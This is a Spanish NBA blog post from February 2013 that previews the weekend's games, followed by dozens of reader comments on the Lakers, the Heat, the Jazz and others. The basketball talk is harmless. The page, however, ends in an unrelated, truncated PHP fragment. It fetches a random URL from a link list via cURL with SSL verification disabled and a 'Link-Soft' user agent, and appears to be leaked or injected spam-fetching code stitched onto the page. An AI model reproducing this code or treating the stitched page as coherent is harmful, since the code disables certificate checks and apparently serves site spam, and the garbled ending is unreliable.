Fin de semana: el trabajo sucio

08 de February de 2013 por MagicJohnson32

El último fin de semana antes del All-Star Weekend llega con una oferta un tanto irregular pero que presenta motivos de sobra para dedicar unas cuantas horas de nuestras vidas a la ardua labor de ver NBA. Al fin y al cabo, alguien tiene que sacrificarse y hacer el trabajo sucio ¿no?

Y hablando de trabajo sucio… no os importará ir comentando en el blog vuestras impresiones ¿verdad? Se agradece.

Veamos lo que nos espera:

VIERNES

La madrugada del viernes llega bien cargada de partidos. De entre todos ellos destaca el Clippers @ Heat (2h00), en lo que parece que supondrá el regreso de Chris Paul tras perderse nueve encuentros por la lesión de rodilla. Blake Griffin, Chauncey Billups y Jamal Crawford también se han entrenado y podrían jugar contra los campeones, que cuentan con las dudas de Bosh, Wade y Allen por culpa de la gripe. La jornada se abrirá con tres partidos, como de costumbre, a la 1h00, cuando los Raptors visitarán a los intratables Pacers, los Nets jugarán en pista de unos Wizards muy mejorados últimamente, y los Lakers, de nuevo inmersos en una profunda crisis existencial a raíz de la lesión de Gasol, visitan una de sus canchas malditas, la de Charlotte. Los Bobcats, últimos de la liga y que sólo han ganado tres partidos en 2013, estuvieron a punto de ganar en el Staples y pondrán a prueba la resistencia mental de los Lakers tras la paliza encajada en Boston.

A la 1h30, los Magic intentarán acabar con su racha de 11 derrotas en pista de los Cavs, los Hornets viajarán a la siempre complicada Atlanta y los Spurs -probablemente sin Duncan ni Ginóbili- buscarán ante los Pistons la duodécima victoria seguida. Además del Clippers-Heat, a las 2h00 también se disputarán un Blazers @ Rockets crucial en la lucha por la octava plaza del Oeste y el Warriors @ Grizzlies, con ambos equipos virtualmente empatados en quinta posición. A la misma hora, OKC Thunder recibirán a los Suns y los Knicks jugarán en Minnesota. Para acabar, un interesante Bulls @ Jazz a las 4h30.

SÁBADO

La madrugada del viernes al sábado nos ofrecerá un menú corto, con la atención puesta en el Warriors @ Mavs (2h30) como partido más igualado, al menos a priori. A la 1h30, los Nuggets, embalados y que ya son cuartos del Oeste, jugarán en cancha de los Cavs. Philadelphia intentará apurar sus opciones de Playoffs con una victoria en casa ante los Bobcats (2h00). El Pistons @ Bucks (2h30) y Jazz @ Kings (4h00) completarán una noche sin mucho atractivo.

DOMINGO

Tras un sábado flojo, un domingo pletórico. Para empezar, nada mejor que el double-header matinal de la cadena ABC, con el Clippers @ Knicks a las 19h00 y el Lakers @ Heat a las 21h30. Los equipos angelinos finalizarán así sus Grammy road trips en dos de las plazas más complicadas de la liga. A tocar de medianoche arrancarán el Blazers @ Magic, Hornets @ Raptors y dos partidos mucho más atractivos: el duelo entre dos de los equipos más en forma, Nuggets @ Celtics, y la visita de Ricky a Marc Gasol en el Wolves @ Grizzlies. A partir de las 2h00 se disputará el interesante encuentro entre Spurs y Nets en Brooklyn, y los Thunder devolverán visita a los Suns dos días después de enfrentarse en Phoenix. El punto final al fin de semana lo pondrán Rockets y Kings en Sacramento a las 3h00.

Comenta

39 comentarios a esta entrada

  1. Ekos dice:
    #1

    Ganando de 8 los Cavaliers en casa, desde luego el fichaje de Spegihts ha supuesto un cambio importante en la dinámica del equipo, ahora por lo menos hay un banquillo más decente, por qué no lo ficharíamos antes…

      Citar

  2. MagicJohnson32 dice:
    #2

    Increíble remontada de los Lakers cuando parecían muertos y enterrados, 20 abajo mediado el tercer cuarto en Charlotte. Ha sido una actuación rara de Kobe, sin un solo punto en la primera mitad, solo 6 en el tercer cuarto y un espectacular final de partido, con 14 puntos en los últimos 6:30, liderando un parcial de 22-10 para acabar.
    No sé muy bien qué pensar de este partido, pero sólo por el hecho de que perdiendo por 20 los Lakers hayan sido capaces de luchar para meterse en el partido y ganarlo, hay algún motivo para la esperanza. Eso sí, los 30 primeros minutos de juego han sido absolutamente depresivos.

      Citar

  3. Jose Luis dice:
    #3

    No he podido verlo, estaba de descanso y mira que era a buena hora, pero tenia que levantarme a las 5 30 hoy y si lo veia ni dormia casi.

    Eso he visto, remontada brutal… Pero bueno, son los Bobcats. Si los primeros 30 minutos han sido depresivos y despues se ha remontado con Kobe-sistema (y defensa) pues bueno, que no doy dos duros por estos Lakers… ¿tu que opinas Magic? ¿lucharán por entrar en PO?

      Citar

  4. Denise dice:
    #4

    Bueno pues otro partido por los Magic casi al final, pero nueva demostración de lo que es capaz Vucevic con su 25-13, bien secundado por Afflalo y Nelson. A pesar de llevar solo 2 victorias en los ultimos 25 partidos!!, estoy mas que satisfecho con la imgen del equipo y el compromiso de los jugadores.
    Y que bueno es Irving, si los Cavs pueden rodearle de algo mejor, son equipo de playoffs fijo para los años venideros.

    Por los Lakers, no se puede negar esta vez que Kobe no esté pasando la bola, está intentando contagiar y animar a los compañeros para que cojan confianza y galones, y el equipo de Lakers no sea tan previsible con el Kobe-sistema. Y Vaya tapón de Henderson a Meeks!!

    Los Nets nuevamente cuajando un pésimo partido, con Kris Humphries al borde del traspaso por Ben Gordon. Cayeron en Washington, con Webster y Nené recordando viejos tiempos en los que eran clave en sus equipos. Los capitalinos están demostrando que con la vuelta de Wall no son una banda, y el año que viene pueden ir formando una buena base para la 2014/15 cuando tendrán espacio salarial para fichar lo que quieran mas Wall, Beal, Crawford, Nené y los rookies que pillen en estos años via Draft.

    Vaya manera mas estupida que tuvo David West de perder un partido. Ganan de 2 a falta de 5 segundos, saca de fondo y envia un melón al centro del campo que obviamente los Raptors recuperan, y anotan sobre la bocina para mandar el partido a la prorroga. En ella, balón a Rudy Gay para que anote casi sobre la bocina la canasta ganadora y los Raptors que se llevan la victoria de Indiana. Que gran pieza adquirieron con Gay, vaya jugón!!

    Otro equipo con bastante futuro son los Hornets, que ganaron a Atlanta a pesar de que Davis no anda muy fino y el Rookie Of The Year cada vez lo tiene más lejos. Victoria importante a domicilio con Vasquez llevando la batuta (21-12) y Gordon ejecutando (27 puntos)

    En Detroit, Popovych hizo una de las suyas y dio descanso a Duncan y Ginobili. Por tanto, los Pistons lo tuvieron mas facil para machacar a los Spurs, con el trío Monroe-Knight-Villanueva por encima de los 20 puntos. La mala noticia fue la confirmación de que Drummond se perderá esta temporada debido a una fractura en una vertebra. Hasta el año que viene, crack!!

    La paliza de la jornada se la llevaron los Clippers, totalmente impotentes ante la efectividad de unos Heat que no acusaron las bajas de Bosh y Allen. Con Lebron en estado de gracia y seleccionando sus tiros mejor que nunca (30 puntos con 9 de 11 en tiros de campo) y un 15/27 en triples, liquidaron el partido a principios del tercer cuarto, por lo que los ultimos 18 minutos solo sirvieron para ver en pista al fondo de armario de ambos equipos. Se avecina paliza de Miami el proximo domingo (21:30 hora española) a Lakers.

    Los Grizzlies consiguieron una importante victoria ante un rival directo como GSW pese a que Randolph sigue sin estar fino de cara al aro (4 de 13!!). Marc y sus 20-11 y la ayuda del recien llegado Daye ayudaron a doblegar a los californianos. De nada sirvieron los 58 puntos logrados por el duo Curry-Lee, el resto del equipo no acompañó.

    Gran victoria de Knicks con un estelar Anthony (36 p) ante Wolves pese al 18-11 de Rubio. La ausencia de Love se nota y Minny no consigue enlazar un par de victorias seguidas.

    Houston ganó facil a Blazers con 35-7-11 de Harden y ojo, 13-16 en Tiros de campo!!! Temporada brutal del jodido barbas y Houston creo que se clasificará comodamente para Playoffs. Los Blazers, un equipo que vive de sus 5 titulares porque el banquillo es para mí el peor banquillo que he visto en mi vida, se vienen abajo si algun titular tiene el dia malo. Esta vez fue Matthews, con 2 puntos y 1 de 9 en tiros.

    Oklahoma ganó facil a Phoenix. Tan facil como que ningun jugador de Thunder superó los 30 minutos de juego. Decepción de la pareja interior de Phoenix, Scola y Gortat que se fueron con 8 puntos y 6 rebotes entre ambos.

    Y por último, la gran victoria conseguida por Bulls en la siempre dificil cancha de Utah. Nate Robinson sigue en estado de gracia y junto a Boozer y Deng lideraron a los suyos. Millsap tuvo un triple para empatar el partido, pero no lo consiguió. 21 puntospara él y 32 para Jefferson, pero este equipo carece de buenos exteriores y esto lo aacaba pagando el equipo. La gran esperanza de Lakers para playoffs es ésta, que Utah se venga abajo y le roben la última plaza.

      Citar

  5. Denise dice:
    #5

    MagicJohnson32: Los Lakers pierden el season opener y Nash se lesiona en el 2º partido de la regular season, que también pierden. Nash es baja durante casi dos meses. Gasol es baja un par de semanas en diciembre. Pau vuelve el 18 y Nash el 22 de diciembre, y los Lakers juegan siete partidos con los “4 fantásticos”, con un balance de 3-4 (de hecho, ganan 3 de 4 y luego pierden tres seguidos). Entonces causan baja Howard y Gasol (y pierden otros tres más). Howard se pierde 3 y Gasol 5 partidos. Cuando Pau vuelve, juegan ocho partidos más juntos con un balance de 3-5.

    En total, el balance es de 6-11 con los 4 fantásticos y de 17-16 con alguno de ellos de baja. Eso sí, fíjate que nunca han jugado más de ocho partidos seguidos juntos y que, de los que juegan juntos, muchos son con Howard mal de la espalda y el hombro, y Pau con la tendinitis. No es excusa, es que realmente no hemos visto jugar a este equipo en condiciones.

    Kobe ha jugado todos los partidos, así que detallo el balance de los otros tres:

    Nash: 11-15
    Pau: 18-18
    Dwight: 20-24

    Gracias, gran dato. Los Lakers no tienen excusas para ir tan mal, pero es verdad que aun no hemos podido ver en condiciones a los 4 fantasticos. Como no seguidor de Lakers, disfruto con su circo diario, pero como seguidor de basket, me gustaría que los 4 continuasen el año siguiente y tener la oportunidad de verlos con un Pau y DH al 100%

      Citar

  6. Ruxixón dice:
    #6

    Y Nicholson también ha hecho un partidazo para Orlando.La verdad es que abordando la temporada de los Magic desde el prisma de sentar las bases para el futuro hay que ser medianamente optimistas.

    Los Bobcats probablemente sea de los equipos que mayor número de partidos han perdido cuando los tenían en la mano.No sé,su inicio de temporada me gustó,de hecho siempre valoré postivamente el trabajo de Dunlap con un grupo que tenía el lastre de la temporada anterior…teniendo en cuenta el draft que viene pueden hacer un movimiento importante por algún jugón interior juntando ronda,alguno de los exteriores que tienen y quizás Biyombo.Vamos a ver Cho que hace en el verano.

      Citar

  7. MagicJohnson32 dice:
    #7

    Jose Luis:
    No he podido verlo, estaba de descanso y mira que era a buena hora, pero tenia que levantarme a las 5 30 hoy y si lo veia ni dormia casi.

    Eso he visto, remontada brutal… Pero bueno, son los Bobcats. Si los primeros 30 minutos han sido depresivos y despues se ha remontado con Kobe-sistema (y defensa) pues bueno, que no doy dos duros por estos Lakers… ¿tu que opinas Magic? ¿lucharán por entrar en PO?

    Lo veo muy difícil. Sin Pau, haría falta una versión bastante buena de Howard, y de éste no sabemos ni si aguantará físicamente, mucho menos si estará en condiciones de rendir. El ataque lo puede sostener Kobe con Nash, Clark, Jamison, MWP y Meeks, más o menos, pero en defensa ha de ser Howard quien marque diferencias. Uno de los grandes problemas de los Lakers esta temporada es que Howard no ha sido la “one-man defense” que sabemos que puede ser. Anoche, sin ir más lejos, la defensa hace posible la remontada, y Howard tiene un papel fundamental en ese tramo. Y en ataque, el Kobe-sistema es relativo: los Lakers al final volvieron a la fórmula de jugar con Kobe en el poste medio, y a partir de ahí mover al hombre abierto (así llegan triples de Meeks y Nash) o, si no llega el 2 contra 1, Bryant se la juega. En la remontada hubo buen movimiento de balón, buena intensidad, ayudas en defensa… parecido al tramo final en Brooklyn. Pero si ves los primeros 30 minutos, son lamentables. En resumen, la única vía para que los Lakers puedan luchar por los Playoffs es que repitan con frecuencia esa fórmula.

      Citar

  8. nba dice:
    #8

    La verdad es que en los Lakers al menos parece que Kobe todavia tiene “fe” en que podran entrar en playoffs, tendran que aferrarse a eso.
    Aunque Howard todavia esta limitado fisicamente, ofensivamente da ganas de arrancarse los ojos verle recibir el balon de espaldas fuera de debajo del aro e intentar hacerse sitio y anotar, yo lo cambiaba por el barbas…

      Citar

  9. Denise dice:
    #9

    Creo que Lakers solo pueden aspirar a la 8º plaza en detrimento de Utah.

    Analizando el calendario de ambos, mis cuentas son:

    – En lo que queda de febrero:
    Lakers : 4 victorias
    Utah: 3 victorias

    – Marzo:
    Lakers: 10 victorias
    Utah: 7 victorias

    – Abril:
    Lakers: 6 victorias
    Utah: 5 victorias

    Según mis cuentas (que no sirven para nada..xD) los Lakers entrarían en playoffs por una victoria.
    Lo que les queda de febrero hasta el partido del 5 de marzo contra Oklahoma es muy duro, si ahí consiguen un 50% de victorias, deben entrar porque luego les queda un mes de marzo muy pero que muy fácil.
    Después, el mes de abril vuelve a ser complicado pero la mayoría de partidos son en casa, y en vísperas de playoffs, lo mas normal es que los cracks de GSW, Spurs y Rockets (sus 3 ultimos rivales) ni jueguen o lo hagan con menos minutos e intensidad de lo normal.

    A Utah le queda un febrero con rivales menores pero fuera de casa y rivales muy duros en casa, bastante fuerte lo que les queda de mes.
    Después en Marzo vuelven a tener salidas muy dificiles, y lo que consigan en su cancha será esencial para su futuro. En abril, su calendario vuelve a ser favorable y lo que apriete el publico en su cancha va a ser vital

      Citar

  10. Nacho dice:
    #10

    Llevo tiempo sin comentar.Pero os sigo a diario. Gracias por todo. Tampoco he podido ver mucho, por eso no comento.
    Pero esta mañana viendo el Box Score y resúmenes, he flipado con dos cosas:
    Calderón; ya se que alguno lo metéis en el grupo del cazo mix, y creo que sois injustos con él. He visto a pocos tipos más profesionales que él. Llevaba dos años regulares(con momentos espectaculares, eso sí) creo que más debido a problemas físicos que a otras cosas. Bastante buena temporada en Toronto, y en Detroit empieza a ser la leche. Numerazos y jugadones al final de partido igualado. Con él y sus torres los del automóvil pueden hacer algo serio el año que viene. Y si él pasa a gusto estos meses no creo que sea difícil retenerlo. No creo que sea un tipo que ponga problemas a la pasta.
    DENVER: Sí, con mayúsculas. La hoja del BoxScore que presentaron anoche es lo que sueña todo entrenador. 9 tipos jugando, todos (salvo Chandler con 7) en dobles dígitos de anotación, ninguno llega a 20,. Todos (salvo dos con 1 y 2 respectivamente) entre 4 y 9 rebotes. El equipo al 50% de tiro. Todos con +/- positivo…
    Se que muchos decís que les falta un jugador franquicia. Yo creo que les falta creérselo, y si lo empiezan a hacer, cuidado. La finales de conferencia no son una quimera. Y sería una gran ayuda al baloncesto. Sobre todo si jugasen esa hipotética final con la camiseta vintage.

      Citar

  11. Chipi dice:
    #11

    Y Lavoy Allen, ¿qué? Animalico, 11 rebotes ofensivos para un total de 22.

      Citar

  12. Simon dice:
    #12

    Nacho:
    Llevo tiempo sin comentar.Pero os sigo a diario. Gracias por todo. Tampoco he podido ver mucho, por eso no comento.
    Pero esta mañana viendo el Box Score y resúmenes, he flipado con dos cosas:
    Calderón; ya se que alguno lo metéis en el grupo del cazo mix, y creo que sois injustos con él. He visto a pocos tipos más profesionales que él. Llevaba dos años regulares(con momentos espectaculares, eso sí) creo que más debido a problemas físicos que a otras cosas. Bastante buena temporada en Toronto, y en Detroit empieza a ser la leche. Numerazos y jugadones al final de partido igualado. Con él y sus torres los del automóvil pueden hacer algo serio el año que viene. Y si él pasa a gusto estos meses no creo que sea difícil retenerlo. No creo que sea un tipo que ponga problemas a la pasta.
    DENVER: Sí, con mayúsculas. La hoja del BoxScore que presentaron anoche es lo que sueña todo entrenador. 9 tipos jugando, todos (salvo Chandler con 7) en dobles dígitos de anotación, ninguno llega a 20,. Todos (salvo dos con 1 y 2 respectivamente) entre 4 y 9 rebotes. El equipo al 50% de tiro. Todos con +/- positivo…
    Se que muchos decís que les falta un jugador franquicia. Yo creo que les falta creérselo, y si lo empiezan a hacer, cuidado. La finales de conferencia no son una quimera. Y sería una gran ayuda al baloncesto. Sobre todo si jugasen esa hipotética final con la camiseta vintage.

    Yo estoy de acuerdo, para mi solo les falta creerselo y un 4 que sea capaz de jugar ( un poco ) de espaldas al aro… pero si se lo creyeran no tendrían techo… con lo dificil que es jugar en Denver por el tema de la altura y demás…
    Son demasiado conformistas, se conforman con correr al contrataque sin mas… cuando tienen piezas ( y piernas ) suficientes para intentar ejercer una defensa asfixiante …
    Iguodala para mi se ha adaptado a la perfección… el inicio dubitativo se debió mas a una cuestión de calendario que otra cosa… y Gallo llegó en muy baja forma pero ahora que está mas en forma es un tío capaz de asumir los balones importantes con ciertas garantias… me gustaría que utilizaran mas en este tipo de juego a A.Randolph pero no está teniendo minutos prácticamente.

      Citar

  13. rumbero dice:
    #13

    De acuerdo con las dos cosas Nacho. Escribe más hombre aunque no puedas ver tanta NBA que seguro salen cosas interesantes. Calderón les puede venir muy bien a estos Pistons, otra cosa es venga un aspirante con un buen contrato y le seduzca la idea, pero vaya, que al tio le han dado galones y en 4 partidos está respondiendo. Faltará ver a que nivel son capaces de jugar hasta final de temporada y si le puede atraer el proyecto. Lo de Villanueva a mi me lo tendran que explicar un día…

    Y Utah que palma en Sacramento…no se si entraba en las cuentas de Denise. Yo sigo sin entender que no hayan soltado aun a Millsap o Al para traer a un exterior de nivel, que falta les hace. Lo último que sonaba era el Jefferson por Splitter-Mills-Jackson que convence poco…te traes a otro center y dos escoltas que no te sacan de pobre. De que den o no el paso puede depender también las victorias que necesiten los Lakers

      Citar

  14. nba dice:
    #14

    Hablando de Lakers…, otro dia mas el circo no termina, hablando el padre de Howard poniendo como ejemplo a Stan Van Gundy, hay dias que aunque sea la espn, parece el mundotoday

      Citar

  15. Simon dice:
    #15

    Es que lo de Utah me parece sangrante… todos los equipos matandose por tener buenos interiores y ellos no tienen ni uno, ni dos ni tres sino 4 interiores de buen nivel ( estoy convencido que kanter con minutos y tranquilidad podría ser un grande ) y no dan el paso para traspasar a uno… es que yo pienso que moviendo a Al o Millsap y trayendo un exterior capaz de anotar con fluidez no perderían casi nada en la pintura y ganarían muchisimo por fuera ya que ahí no tienen nada de nada… en fin supongo que si no los han movido es porque tampoco habrá llegado nada bueno…
    el traspaso que suena con San Antonio es un atraco a mano armada para Utah… se desharían de su pivot estrella para traer otro buen pivot y dos exteriores que no te sacan de ningun aprieta…

      Citar

  16. Simon dice:
    #16

    Por cierto en que piensa Nets para querer traspasar a Humpries por Gordon??? Claro que Gordon sería una mejora para el juego exterior de Nets pero sinceramente, ahi con JoJo y Brooks está la posición bien cubierta en relacion a como tienen la posiciónes de interiores en la que sin Humpries apenas se quedarían con Lopez, Blatche y Evans… y con el historial de Lopez me parece poco…

      Citar

  17. rumbero dice:
    #17

    Habían apretado los Knicks con un arreón de Felton y poniéndose sólo a 6 puntos a falta de 2.45 hasta que Paul ha matado el partido. Son otra cosa los Clippers con él en pista. Y 42 puntazos de Melo que de poco han servido.
    Gran noticia la vuelta de Billups que incluso ha jugado minutos importantes del último cuarto. Como le ha dicho Kidd antes de empezar el match:” Welcome back young fella”

      Citar

  18. Denise dice:
    #18

    rumbero:

    Y Utah que palma en Sacramento…no se si entraba en las cuentas de Denise. Yo sigo sin entender que no hayan soltado aun a Millsap o Al para traer a un exterior de nivel, que falta les hace. Lo último que sonaba era el Jefferson por Splitter-Mills-Jackson que convence poco…te traes a otro center y dos escoltas que no te sacan de pobre. De que den o no el paso puede depender también las victorias que necesiten los Lakers

    Ese partido se lo había contado como victoria.

    Por cierto, muy bien los Lakers hasta ahora en Miami. Ya iremos contando….

      Citar

  19. Denise dice:
    #19

    26-25 para Lakers al final del primer cuarto…Muy buen partido colectivo de Lakers hasta ahora, muy solidario el equipo, aunque Lebron está muy enchufado y volviendo a seleccionar sus tiros lo que le proporciona grandes porcentajes de tiro. Ahora mismo, diría que será la superioridad de banquillo de Miami lo que puede desequilibrar el partido. Veremos a ver este inicio de segundo cuarto con los suplentes en pista.

    ¿Nadie más viendo el partido?

      Citar

  20. MagicJohnson32 dice:
    #20

    Denise: Ese partido se lo había contado como victoria.

    Por cierto, muy bien los Lakers hasta ahora en Miami. Ya iremos contando….

    Bien, sí, sobre todo controlando los errores que los Heat aprovechan para salir como cohetes a la contra. A ver si dura.

      Citar

  21. MagicJohnson32 dice:
    #21

    Cómo mola Earl Clark.

      Citar

  22. Denise dice:
    #22

    Earl Clark….ah se nos escapó de Orlando sin darle oportunidades. Se ha sacado un 2+1 de la manga.

    Howard también esta enchufado por ahora.

    Por cierto, en el otro partido, Carmelo ha liquidado a Clippers con 42 puntos. Se están desinflando los Clippers ultimamente, y la llegada de Billups en vez de servir de revulsivo, ha servido para desajustar los roles.

      Citar

  23. Denise dice:
    #23

    Ha sido alabar a Clark y tirarse un air-ball de 6 metros..xD

    40-35 para Lakers sin Kobe ni Nash. Creo que D’Anthoni debe meterlos en pista e intentar romper el partido un poco.

      Citar

  24. MagicJohnson32 dice:
    #24

    Denise:
    Por cierto, en el otro partido, Carmelo ha liquidado a Clippers con 42 puntos. Se están desinflando los Clippers ultimamente, y la llegada de Billups en vez de servir de revulsivo, ha servido para desajustar los roles.

    Mmmm… Han ganado los Clippers fácil, jajaja 😉

      Citar

  25. Denise dice:
    #25

    Al descanso 53-53

    Bueno…que partidazo!! Después de la paliza de Heat a Clippers el pasado viernes, pensaba que Lakers se llevarían una buena tunda, pero están haciendo un gran partido, aunque el rebote ofensivo de Miami les está matando.

    Que importante es tener a un Battier en tu equipo, con 2 triples ha rescatado a Miami, el cual ha pasado un momento de aturdimiento, de todas formas, los Heat son un rodillo en ataque, con que facilidad anotan, es dificil que Lakers vayan a aguantarle el partido a 110 puntos como va la proyección ahora mismo.

      Citar

  26. Denise dice:
    #26

    MagicJohnson32: Mmmm… Han ganado los Clippers fácil, jajaja

    Jaja Epic Fail…

    Lo siento, he visto el box-score de pasada en un tiempo muerto del Miami-Lakers y me habré confundido de digitos. De todas, formas, la imagen de Clippers el viernes fue lamentable y llevan un balance de 4-8 en los últimos 12 partidos

      Citar

  27. Sancho88 dice:
    #27

    Hace mil que no comentaba nada, pero estoy viendo a los Lakers-MIami (partidazo) y creo que fue Denise el que lo dijo el otro día, lo de Nash y Howard no va muy bien que digamos… son incompatibles hasta vomitar. En fin, acabarán en playoffs estos Lakers, pero apestan como nunca. Kobe en modo dios, por cierto. Menudo añazo!!

      Citar

  28. Denise dice:
    #28

    Sancho88:
    Hace mil que no comentaba nada, pero estoy viendo a los Lakers-MIami (partidazo) y creo que fue Denise el que lo dijo el otro día, lo de Nash y Howard no va muy bien que digamos… son incompatibles hasta vomitar. En fin, acabarán en playoffs estos Lakers, pero apestan como nunca. Kobe en modo dios, por cierto. Menudo añazo!!

    que tal tio…No, no fui yo el que dijo eso. Creo que con un entrenador en condiciones que supiera sacar el 100% de ambos, son jugadores compatibles.
    La segunda parte ha empezado con Kobe-sistema para Lakers. Por ahora les va bien, pero no creo que sea ese el camino.
    Que fichajazo el de Andersen para Heat. Que acierto, Como pelea el muy cabrón, incluso ha ido al centro del campo a buscar a Kobe y defenderlo…

      Citar

  29. Denise dice:
    #29

    Los Lakers tienen que empezar a defender. Actualmente no están en condiciones de pelearle un partido a Miami a 110 puntos.
    Y Kobe lo está bordando pero sería mejor que involucrase mas a los compañeros como hizo en los primeros 8 minutos con 5 asistencias. Este Kobe-sistema de la 2º parte se hace previsible.

      Citar

  30. Denise dice:
    #30

    78-73 para Miami a final del 3er cuarto. Ya lo comenté antes pero…el rebote ofensivo está matando a Lakers, a parte de que James sea un crack.

      Citar

  31. nba dice:
    #31

    Tiene pinta de que los Lakers se van a desinflar en el ultimo cuarto, sobre todo ante una rotacion tan larga como la de Miami, que sin ser nada del otro mundo es resultona, eso si a D’Antony habra que reconocerle el merito de haber dado la oportunidad a Clark y que este la este aprovechando

      Citar

  32. Sancho88 dice:
    #32

    El duelo Lebron versus Kobe está siendo la hostia. Quien se lo haya perdido mala suerte. El último cuarto promete

      Citar

  33. MagicJohnson32 dice:
    #33

    Lo del rebote es ridículo, está matando a los Lakers. Más les vale empezar bien el último cuarto.

      Citar

  34. Denise dice:
    #34

    nba:
    Tiene pinta de que los Lakers se van a desinflar en el ultimo cuarto, sobre todo ante una rotacion tan larga como la de Miami, que sin ser nada del otro mundo es resultona, eso si a D’Antony habra que reconocerle el merito de haber dado la oportunidad a Clark y que este la este aprovechando

    Nooo!! D’Anthoni se ha encontrado con Clark tras las lesiones de Howard, Hill y Pau, y lo ha tenido que ir poniendo porque no tenía mas jugadores, al igual que le pasó con Jeremy Lin.
    Realmente, ni en Phoenix, ni en Orlando ni en L.A. le han dado oportunidades a Clark, que por cierto, vaya contratazo que se va a sacar el año que viene en el equipo que sea.

      Citar

  35. Denise dice:
    #35

    Wowww, Lebron haciendo una de las suyas y Miami empieza a romper el partido. 7 arriba a falta de 5 minutos.

    No quiero ser duro, pero después de ver la final de Copa con tantas faltas, interrupciones, desaciertos, y ver ahora este partidazo, solo puedo decir que en mi opinión el baloncesto europeo….apesta.

    Incluso el baloncesto femenino me gusta más que el masculino en Europa, es más dinámico, alocado y de correcalles y hay nobleza dejando hacer contraataques y no con tantas faltas tácticas. Gran partido del Girona esta tarde ante el Perfumerías!!

      Citar

  36. Denise dice:
    #36

    10 arriba Miami a falta de 2’40 . Muy cuesta arriba para Lakers, por no decir imposible. Nadie en Lakers esta echandole una mano en ataque a Kobe y esto lo están pagando, en cambio, por Miami a parte del Big 3, a Chalmers y a Battier no le está temblando la mano a la hora de tirarse tiros calientes.

      Citar

  37. MagicJohnson32 dice:
    #37

    Lo que decía al descanso: los Lakers estaban evitando las pérdidas y así se mantenían en el partido. Cuando han dejado de hacerlo, se acabó.

      Citar

  38. Denise dice:
    #38

    Bueno, pues gana Miami a Lakers, a pesar de ganar por 10 (107-97) , no ha sido tan facil como dicta el marcador. La clave del partido, el claro dominio de Heat en el rebote, especialmente en el ofensivo dandole mayores oportunidades de tiro, y un par de pérdidas tontas al final de los californianos que han propiciado puntos faciles a Miami con esos clasicos contraataques de Lebron & Wade.

    Excelente partido de Lebron y Wade en ataque, martilló pilón el de estos 2. Lakers, a pesar de su gran partido, no tuvo gasolina al final para aguantar el rodillo en ataque de Miami. Genial Kobe, pero muy sólo en ataque. A mi parecer, Howard ha hecho un muy digno partido, y las pocas bolas que le han metido las ha sabido aprovechar.

    Conclusión: A los aficionados de Heat…decirles que los veo favoritos nº1 al anillo; y para la parroquia de Lakers, que si juegan con la seriedad y el compromiso de hoy, llegan a playoffs seguro, y ahí a rezar para que Pau y DH estén al 100% y el ambiente se haya mejorado en el vestuario.

      Citar

  39. franitis dice:
    #39

    Después de 3 OT los Celtics ganan su octavo partido seguido… Increíble. Por cierto, Pierce parece haber recuperado el “Clutch”, vaya triplazo se marca para meter al equipo en uno de los OT…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>